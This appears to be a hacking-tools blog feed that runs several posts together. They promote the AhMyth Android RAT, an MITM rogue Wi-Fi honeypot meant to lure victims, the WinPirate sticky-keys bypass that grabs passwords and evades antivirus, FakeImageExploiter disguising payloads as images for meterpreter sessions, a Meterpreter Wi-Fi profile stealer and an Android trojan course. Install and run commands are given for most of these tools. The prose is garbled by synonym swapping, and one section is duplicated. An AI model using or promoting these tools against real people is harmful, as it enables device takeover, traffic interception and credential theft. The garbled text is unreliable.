AhMyth Android Rat – Remote Administration Tool

AhMyth Android RAT is an Android Remote Administration Tool. It consists of two parts :

  1. Server side : Desktop application based on electron framework (control panel)
  2. Client side : Android application (backdoor)

You have two options to install AhMyth

From source code

  • Electron (to start the app)
  • Java (to generate apk backdoor)
  • Electron-builder and electron-packer (to build binaries for (OSX,WINDOWS,LINUX))
  1. git clone https://github.com/AhMyth/AhMyth-Android-RAT.git
  2. cd AhMyth-Android-RAT/AhMyth-Server
  3. npm start

Also Read MITM : Man-in-the-middle Router

From binaries

  • Download a binary from by clicking here
  • Java (to generate apk backdoor)

Screenshots

Video Tutorial

https://youtu.be/DDIZTABABzs

MITM : Man-in-the-middle Router

Turn any linux PC into an open Wi-Fi organize that quietly mitm or Man-in-the-middle all http activity. Keeps running inside a Docker container utilizing hostapd, dnsmasq, and mitmproxy to make an open honeypot remote system named “Open”. For included fun, change the system name to “xfinitywifi” to autoconnect any individual who has ever associated with those systems… they are all over.

# clone the repo
git clone https://github.com/brannondorsey/mitm-router
cd mitm-router

# build the image this step can be omitted if you prefer to pull 
# the image from the docker hub repository
docker build . -t brannondorsey/mitm-router

Run the following, replacing AP_IFACE and INTERNET_IFACE with your wireless device and internet-connected ethernet/wireless devices respectively. You can can get see the name of your network devices by running ifconfig.

Also Read WiFi Password Decryptor Software To Recover Wireless Password

# run the container
docker run -it --net host --privileged \
-e AP_IFACE="wlan0" \
-e INTERNET_IFACE="eth0" \
-e SSID="Public" \
-v "$(pwd)/data:/root/data" \
brannondorsey/mitm-router

If all went well, you should see something like this:

Current MAC:   a5:ae:f9:a4:b7:e3 (TP-LINK TECHNOLOGIES CO.,LTD.)
Permanent MAC: a5:ae:f9:a4:b7:e3 (TP-LINK TECHNOLOGIES CO.,LTD.)
New MAC:       00:d2:6b:d5:fe:bd (PHOTRON USA)
[ ok ] Starting system message bus: dbus.
[ ok ] Starting DNS forwarder and DHCP server: dnsmasq.
[ ok ] Starting advanced IEEE 802.11 management: hostapd.
Proxy server listening at http://0.0.0.0:1337

mitm-router transparently captures all HTTP traffic sent to the router at 10.0.0.1:80. It does not intercept HTTPS traffic (port 443) as doing so would alert a user that a possible man-in-the-middle attack was taking place. Traffic between URLs that begin with https:// will not be captured.

The mitm-router/data/ folder is shared with the docker container so that we can view the capture files that it places there on our host machine. By default, you will find the mitmdump capture file in mitm-router/data/http-traffic.cap.

You can also connect your INTERNET_IFACE to a hostpot running on your phone your for mitm pwnage on the go 😉

Configuring Man-in-the-middle

Supported environment variables are listed below with their default values:

# wireless device name that will be used for the Access Point
AP_IFACE="wlan0"

# device name that is used for the router's internal internet connection
# packets from AP_IFACE will be forwarded to this device
INTERNET_IFACE="eth0"

# wireless network name
SSID="Public"

# optional WPA2 password; if left empty network will be public
PASSWORD=""

# optional randomization of AP_IFACE MAC address
# can be set to a specific value like "XX:XX:XX:XX:XX:XX"
# or "unchanged" to leave the device MAC alone
MAC="random"

# tcpdump output file location inside the container
CAPTURE_FILE="/root/data/http-traffic.cap"

# optional mitmproxy filter
# see http://docs.mitmproxy.org/en/stable/features/filters.html
FILTER=""

Security

This access point runs inside of Docker for isolation, ensuring that any vulnerabilities that may be exploitable in the access point will not allow an adversary access to your computer or home network. That said, there are a few caveats to be aware of:

  • –net host shares all of the network interfaces and iptables entries from the host machine with the docker container. Assume that a vulnerable docker container would have root access to these devices.
  • Running in –privileged  mode gives extended permissions to the docker container
  • Your host machine (the one running docker) will be accessible on the “Public” network as a connected client. For this reason, please use a firewall (ufw on linux) to block incoming traffic on all ports so that computers on the “Public” network do not have access to exposed services your machine.
  • All traffic on the honeypot network will be outbound from you home network’s gateway. If someone on the “Public” network is torrenting or conducting illegal activity you will be held accountable and your ISP may cancel your service.

For added security, I prefer to run this docker container on a dedicated computer, like a Raspberry Pi.

WiFi Password Decryptor Software To Recover Wireless Password

WiFi Password Decryptor is the FREE software to in a flash recover Wireless record passwords put away on your framework. It consequently recover all sort of Wireless Keys/Passwords (WEP/WPA/WPA2 and so forth) put away by Windows Wireless Configuration Manager.

For each recovered WiFi account, it displays following information

  1. WiFi Name (SSID)
  2. Security Settings (WEP-64/WEP-128/WPA2/AES/TKIP)
  3. Password Type
  4. Password in clear text

After the effective recovery you can spare the password list to HTML/XML/TEXT document. You can likewise right tap on any of the showed account and rapidly duplicate the password.

Also Read How To Hack Android Device using Python Scripts ?

In the engine, ‘WiFi Password Decryptor’ utilizes System Service technique (rather than infusing into LSASS.exe) to decode the WiFi passwords. This makes it more secure and solid. Additionally it makes us to have recently single EXE to deal with both 32-bit and 64-bit platforms.

It has been effectively tried on Windows Vista and higher working frameworks including Windows 8. Click here to download the application.

How to Use WiFi Password Decryptor

WiFiPasswordDecryptor is easy to use with its simple GUI interface. Here are the brief usage details

  • Launch WiFiPasswordDecryptor on your system
  • Next click on ‘Start Recovery’ button and all stored WiFi account passwords will be recovered & displayed as shown in screenshot 1 below.
  • You can right click on any of the displayed account to quickly copy the password
  • Also can generated detailed password recovery report in HTML/XML/Text format by clicking on ‘Export’ button and then select the type of file from the drop down box of ‘Save File Dialog’.

Note : You need to have administrative privileges to run this tool.

Limitations

This tool can recover the WiFi Passwords configured by Windows Wireless Configuration Manager only. Also it does not work on older operating systems like Windows XP, 2003.It works well with Vista & all the higher versions.

 

How To Hack Android Device using Python Scripts ?

Ever think about how awful folks hack Android gadgets? Or on the other hand how they just figure out how to take the information from remote areas? All things considered, there are numerous approaches to get in on any android or iOS smartphones. Be that as it may, the simplest and best path is to utilize a secondary passage (Trojan, malware) that opens the channel of taking individual data, taking control of the versatile, promotion cheats, taking money related data and other potential damage.

Who help the hackers? Hacking tools? Be that as it may, now and then or more often than not, the apparatuses don’t work. This is the place we separate a content kiddie and a genius; an expert programmer and digital security proficient composes his own particular code to sidestep the confronting issues and difficulties, while content kiddies just take after what’s being made by a master.

Also Read Metasploit getwlanprofiles – Simple Script To Download Wireless Profiles From Windows Client

Master hacking like an ace utilizing python scripts, figure out how to hack any android gadget utilizing secondary passage, compose your own scripts to hack, don’t depend on anyone’s devices.

EH Academy offers a crash training program that teaches the art of writing python scripts that hack Android devices. The focus of the course is to create Trojan, spread Trojan to get access of many android devices at once, learn to create the backdoors and hack any Android phone. What you will learn in training program ;

  1. Code a simple Android GUI interface purely in Python
  2. Build a simple cross platform SSH botnet purely in Python
  3. Code an SSH Android Trojan
  4. Transfer / exfiltrate Data out of target device
  5. Run Python SSH reverse shell on Windows, Linux, Android
  6. Transfer and decode Decode Android calls, sms messages, Whatsapp chat Database.

Click on the download button for more information regarding the training program.

 

Metasploit getwlanprofiles – Simple Script To Download Wireless Profiles From Windows Client

Metasploit getwlanprofiles is a Meterpreter script which when kept running against Windows 7 or Vista boxes will extract and download all the wireless profiles that are setup with the Windows customer, i.e. not with outsider customer applications.

It does this by using the following command to dump all the profiles to the current %TEMP% directory

netsh wlan export profile folder=%TEMP%

At that point for each line of the output finding the filename of the profile and downloading it. To clean up the record is then erased from the index.

Also Read WinPirate – Automated Sticky Keys Hack

The profiles are stored in the .msf3/logs/scripts/wlan_profiles/ directory.

To re-use the profiles they can be imported into another Windows box by using the following command

netsh wlan add profile filename="the_filename.xml"

Something that was found while testing this is whether you have an outer wifi card and setup the profiles at that point expel the card the profiles are never again accessible to the netsh script. When the card is reinserted the profiles return. There will in any case be an approach to get to them however Metasploit getwlanprofiles doesn’t do it.

Metasploit getwlanprofiles Usage

Simply uncompress the script and move it to the meterpreter/scripts directory. Also probably best remove the version number from the filename while doing so.

When you run Metasploit getwlanprofiles should look like this:

meterpreter > run getwlanprofiles 
[*] Running Windows Wlan Profile Downloader Meterpreter Script
[*] New session on 192.168.0.80:53831...
[*] Running export command - netsh wlan export profile folder=C:\Users\robin\AppData\Local\Temp
[*] Downloading profile wpa_profile to /home/robin/.msf3/logs/scripts/wlan_profiles/VISTA-DOMAIN_20110110.5030/wpa_profile.xml
[*]     Deleting file C:\Users\robin\AppData\Local\Temp\Wireless Network Connection 2-wpa.xml
[*] Downloading profile thisiswep to /home/robin/.msf3/logs/scripts/wlan_profiles/VISTA-DOMAIN_20110110.5030/thisiswep.xml
[*]     Deleting file C:\Users\robin\AppData\Local\Temp\Wireless Network Connection 2-thisiswep.xml
[*] Downloading profile eap to /home/robin/.msf3/logs/scripts/wlan_profiles/VISTA-DOMAIN_20110110.5030/eap.xml
[*]     Deleting file C:\Users\robin\AppData\Local\Temp\Wireless Network Connection 2-this is it.xml
[*] Found and extracted 3 profiles
[*] Done!

WinPirate – Automated Sticky Keys Hack

We create a way to automate doing the window sticky keys hack from a bootable USB. Then, we automate getting as many saved passwords as possible, drop a listener, and delete all traces that we were there.. All without being detected by antivirus, we should add a mimikittenz option if the computer was found running and unlocked, otherwise we can just run it later remotely

How To Use Sticky Keys Hack

Requirements: a linux bootable USB, this repo on the USB (not in the OS, just put it in the root directory)

Also Read DVIA – Damn Vulnerable iOS Application

  • shutdown windows (make sure not hibernating by holding shift while pressing shut down)
  • hit F12 and select USB
  • sudo -i
  • fdisk -l (note: if you’re on Kali Linux, run parted -l)
  • mkdir /media/windows
  • mount /dev/WHATEVERTHEWINDOWSPARTITIONWASCALLED /media/windows -t ntfs
  • run Stickykeys.sh
  • restart and boot to Windows
  • hit Shift 5 times fast, a command prompt will appear
  • cd to the USB and run WinPirate.bat

If the computer isn’t locked: Then cd to the USB and run Run.bat (this will run WinPirate.bat silently in the background, it should be done in < 10 seconds

Current Issues

  • The chrome passwords grabber that I made is still a .py For it to work, I need to convert it to exe so it doesn’t require python to be installed on the system.
    You can run it with python chromepasswords.py -csv and it will decrypt the Chrome saved passwords database and export it as a CSV
  • The sticky keys automation doesn’t speed the process up as much as I previously thought, as evident by the lengthy “How to Use” section
  • I haven’t been able to write any tools that grab passwords for IE or Firefox

 

DVIA – Damn Vulnerable iOS Application

Damn Vulnerable iOS App or DVIA is an iOS application that is damn vulnerable. Its fundamental objective is to give a stage to portable security enthusiasts/professionals or understudies to test their iOS penetration testing skills in a legitimate situation.

Also Read Use a Fake image.jpg ‘FakeImageExploiter’ to Exploit Targets

DVIA Vulnerabilities and Challenges Include

  1. Local Data Storage
  2. Jailbreak Detection
  3. Excessive Permissions
  4. Runtime Manipulation
  5. Anti Anti Hooking/Debugging
  6. Binary Protection
  7. Touch/Face ID Bypass
  8. Phishing
  9. Side Channel Data Leakage
  10. IPC Issues
  11. Broken Cryptography
  12. Webview Issues
  13. Network Layer Security
  14. Application Patching
  15. Sensitive Information in Memory
  16. Data Leakage to Third parties

All these vulnerabilities have been tested up to iOS 11.

Use a Fake image.jpg ‘FakeImageExploiter’ to Exploit Targets

FakeImageExploiter stores all records in apache2 webroot, zips (.zip) the specialist, begins apache2 and metasploit services(handler), and gives a URL to send to target (triggers agent.zip download). When the casualty runs our executable, our photo will be downloaded and opened in the default picture watcher, our malicious payload will be executed, and we will get a meterpreter session.

However, it additionally stores the operator (not ziped) into Fake ImageExploiter/output folder in the event that we wish to convey agent.jpg.exe utilizing another different attack vector.

This device likewise builds a cleaner.rc file to erase payloads left in target

Also Read WinPirate : Automated Sticky Keys Hack From A Bootable USB

Description

This module takes one existing image.jpg and one payload.ps1 (input by user) and build another payload (agent.jpg.exe) that if executed it will trigger the download of the 2 past files put away into apache2 (image.jpg + payload.ps1) and execute them.

This module additionally changes the agent.exe Icon to coordinate one file.jpg Then uses the satire ‘Shroud extensions for known record types’ strategy to hide the agent.exe expansion.

All payloads (client input) will be downloaded from our apache2 webserver what’s more, executed into target RAM. The main extension (payload contribution by user) that requires to compose payload to plate are .exe doubles.

FakeImageExploiter v1.3 – backdoor images.jpg[.ps1]

CodeName: Metamorphosis
Version release: v1.3 (Stable)
Author: pedro ubuntu [ r00t-3xp10it ]
Distros Supported : Linux Ubuntu, Kali, Mint, Parrot OS
Suspicious-Shell-Activity (SSA) RedTeam develop @2017

Payloads accepted (user input):

payload.ps1 (default) | payload.bat | payload.txt | payload.exe [Metasploit]
"Edit 'settings' file before runing tool to use other extensions"

Pictures accepted (user input):

All pictures with .jpg (default) | .jpeg | .png  extensions (all sizes)
"Edit 'settings' file before runing tool to use other extensions"

Dependencies/Limitations:

xterm, zenity, apache2, mingw32[64], ResourceHacker(wine)
'Auto-Installs ResourceHacker.exe under ../.wine/Program Files/.. directorys'

WARNING: To change icon manually (resource hacker bypass) edit 'settings' file.
WARNING: Only under windows systems the 2º extension will be hidden (so zip it) 
WARNING: The agent.jpg.exe requires the inputed files to be in apache2 (local lan hack)
WARNING: The agent.jpg.exe uses the powershell interpreter (does not work againts wine).
WARNING: This tool will not accept payload (user input) arguments (eg nc.exe -lvp 127.0.0.1 555)
WARNING: The ResourceHacker provided by this tool requires WINE to be set to windows 7

Download/Install/Config:

1º - Download framework from github
     git clone https://github.com/r00t-3xp10it/FakeImageExploiter.git

2º - Set files execution permitions
     cd FakeImageExploiter
     sudo chmod +x *.sh

3º - Config FakeImageExploiter settings
     nano settings

4º - Run main tool
     sudo ./FakeImageExploiter.sh

Framework Banner

Settings file

Agent(s) in windows systems

Video tutorials

FakeImageExploiter [ Official release – Main funtions ]

https://www.youtube.com/watch?v=4dEYIO-xBHU

FakeImageExploiter [ the noob friendly funtion ]

https://www.youtube.com/watch?v=abhIp-SG4kM

FakeImageExploiter [ bat payload – worddoc.docx agent ]

https://www.youtube.com/watch?v=Ah4hejGhj-M

FakeImageExploiter [ txt payload – msfdb rebuild ]

https://www.youtube.com/watch?v=g2E73GyxKhw

WinPirate : Automated Sticky Keys Hack From A Bootable USB

Automated sticky keys hack. Post exploitation it grabs browser passwords, history, and network passwords. Here’s the plan. We create a way to automate doing the sticky keys windows hack from a bootable USB which we can call as WinPirate. Then, we automate getting as many saved passwords as possible, drop a listener, and delete all traces that we were there.

All without being detected by antivirus. We should add a mimikittenz option if the computer was found running and unlocked, otherwise we can just run it later remotely.

Also Read Malicious Apps Change Their Name To Be Back On Google Play Store

How to Use WinPirate

Requirements : a linux bootable USB, this repo on the USB (not in the OS, just put it in the root directory)

Note : chromepasswords.py requires PyWin32

If the computer is locked:

  • shutdown windows (make sure not hibernating by holding shift while pressing shut down)
  • hit F12 and select USB
  • sudo -i
  • fdisk -l (note: if you’re on Kali Linux, run parted -l)
  • mkdir /media/windows
  • mount /dev/WHATEVERTHEWINDOWSPARTITIONWASCALLED /media/windows -t ntfs
  • run Stickykeys.sh
  • restart and boot to Windows
  • hit Shift 5 times fast, a command prompt will appear
  • cd to the USB and run WinPirate.bat

If the computer isn’t locked:

cd to the USB and run Run.bat (this will run WinPirate.bat silently in the background, it should be done in < 10 seconds

Current Issues

  1. The chrome passwords grabber that I made is still a .py For it to work, I need to convert it to exe so it doesn’t require python to be installed on the system.
    You can run it with python chromepasswords.py -csv and it will decrypt the Chrome saved passwords database and export it as a CSV
  2. The sticky keys automation doesn’t speed the process up as much as I previously thought, as evident by the lengthy “How to Use” section
  3. I haven’t been able to write any tools that grab passwords for IE or Firefox

Malicious Apps Change Their Name To Be Back On Google Play Store

The Google Play Store has a notoriety for being the most secure place online to get Android applications, and Google completes a great job of encouraging clients to restrain presentation to malware and different dangers by arranging their smartphones to preclude side-loading and alternative app markets in the Android Settings.

This malware “Android.Reputation.1” shows up on the Play Store hidden in no less than seven applications in the U.S. offering fun, valuable, and once in a while treacherous features. These incorporate emoji keyboard additions, space cleaners, calculators, app lockers, and call recorders. None of the examples we examined really worked as publicized on their Google Play pages. Once the application is introduced, it takes different measures to remain on the gadget, vanish, and delete its tracks.

Also Read Linset : Hack WPA WPA2 Using This Tool

Stay protected from mobile malware by taking these precautions:

  • Keep your software up to date
  • Do not download apps from unfamiliar sites
  • Only install apps from trusted sources
  • Pay close attention to the permissions requested by apps
  • Install a suitable mobile security app, such as Norton or SEP Mobile, to protect your device and data
  • Make frequent backups of important data